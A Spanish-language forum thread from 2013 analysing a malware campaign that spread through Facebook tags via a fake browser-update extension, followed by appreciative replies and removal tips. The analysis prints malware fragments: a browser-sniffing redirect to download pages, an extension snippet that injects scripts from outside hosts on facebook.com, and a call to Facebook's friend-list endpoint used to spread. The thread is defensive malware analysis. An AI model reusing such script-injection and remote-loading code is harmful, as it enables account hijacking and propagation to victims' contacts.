comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Malware se propaga mediante "etiquetas" en Facebook

  • 8 Respuestas
  • 3861 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« en: Marzo 14, 2013, 06:17:53 am »

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta You are not allowed to view links. Register or Login  WDF…!! Pero seguí mas adelante tome la dirección You are not allowed to view links. Register or Login  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

Código: PHP
  1. var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
  2. var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
  3. var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
  4. var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
  5. if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
  6. else
  7. if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
  8. else
  9. if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
  10. else
  11. {var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

You are not allowed to view links. Register or Login

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

Código: Javascript
  1. if(location.hostname.indexOf("facebook.com") >= 0){
  2.  
  3. addJavascript('http://sosyalpaket.net/yeni.php');
  4.  
  5. addJavascript('http://fbmedyahizmetleri.com/bakgel.php');
  6.  
  7. addJavascript('http://facebookhizmetlerim.com/user.php');
  8.  
  9. }

En el user.php me tope con:
Código: PHP
  1. "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  2.  
  3. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos
« Última modificación: Diciembre 08, 2014, 03:10:55 pm por Expermicid »

Desconectado M1CR0B110

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Marzo 26, 2013, 04:05:35 pm »
Buena  info

Desconectado F0M3T

  • *
  • Underc0der
  • Mensajes: 177
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf
« Respuesta #2 en: Marzo 26, 2013, 04:20:07 pm »
Buenísimo aporte, y gran descubrimiento, gracias por aportarlo, ahora nadamás nos queda darlo a conocer para que todos se cuiden.
Saludos.

Esto no se trata de ganar, se trata de no perder.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« Respuesta #3 en: Marzo 26, 2013, 06:14:53 pm »
En el navegador de Gogle Chrome el malware se encuentra en : C:\Users\"Uusario"\AppData\Local\Google\Chrome\User Data\Default\Extensions (en Windows 7)
Pues si lo eliminan directamente del navegador no se podra pues tiene redireciones al entrar a chrome://extensions/  al WebStore..!! Asique es mejor eliminarlo manualmente.

Lo interezante del complementoen Google  chrome posee una especie de "bypass" que hace al que se instale como si fuera del un complemento del WebStore (testeado en WinXp) pues no necesita la dichosa "--enable-easy-off-store-extension-install". algo que muy interesante.

Saludos...
atte.: CodePunisher


Desconectado mhz

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Marzo 28, 2013, 01:24:19 am »
Muy interesante el post . podrias subir la muestra del malware a algun lado ? me interesaria hacerle un research en especial a ese supuesto "bypass" de chrome saludos :)

Desconectado peruvianrulez

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: peruvianrulez
« Respuesta #5 en: Abril 05, 2013, 04:29:17 am »
muy buena explicacion sobre todo con las imagenes que dejan ver lo necesario ... pero bueno si tiene alguien tutorial sobre esto y de likejacking seriabueno q lo incluyan aca

Desconectado EvilSoft

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Abril 11, 2013, 10:00:11 am »
excelente informacion ...... codepunisher

Desconectado bruxinho

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: bruxinho_dark
« Respuesta #7 en: Junio 30, 2013, 12:51:52 pm »
interessante informacion rs

Desconectado elshotta

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Julio 02, 2013, 01:31:35 pm »
mmm muy bueno pero los codigos php de donde los sacaste?
o los adivinaste
saludos

 

¿Te gustó el post? COMPARTILO!



Análisis de Malware: Enfoque y caso práctico | Seguridad Informática

Iniciado por Expermicid

Respuestas: 2
Vistas: 2957
Último mensaje Agosto 21, 2014, 10:43:22 pm
por WhiZ
[WinLockLess] Protege tu inicio contra el Malware en Windows.

Iniciado por Baku

Respuestas: 7
Vistas: 3866
Último mensaje Octubre 23, 2014, 05:50:24 am
por Gabriela
Análisis de Malware(Static Analysis) [Parte 1]

Iniciado por fudmario

Respuestas: 4
Vistas: 2957
Último mensaje Marzo 20, 2014, 02:13:04 pm
por pimeo
Ocultar malware usando ataques de precarga de dll

Iniciado por blackdrake

Respuestas: 2
Vistas: 1954
Último mensaje Agosto 09, 2014, 10:20:30 pm
por Baku
Análisis de un malware que detecta el entorno virtual

Iniciado por Gabriela

Respuestas: 3
Vistas: 2242
Último mensaje Agosto 18, 2016, 12:08:20 pm
por Unname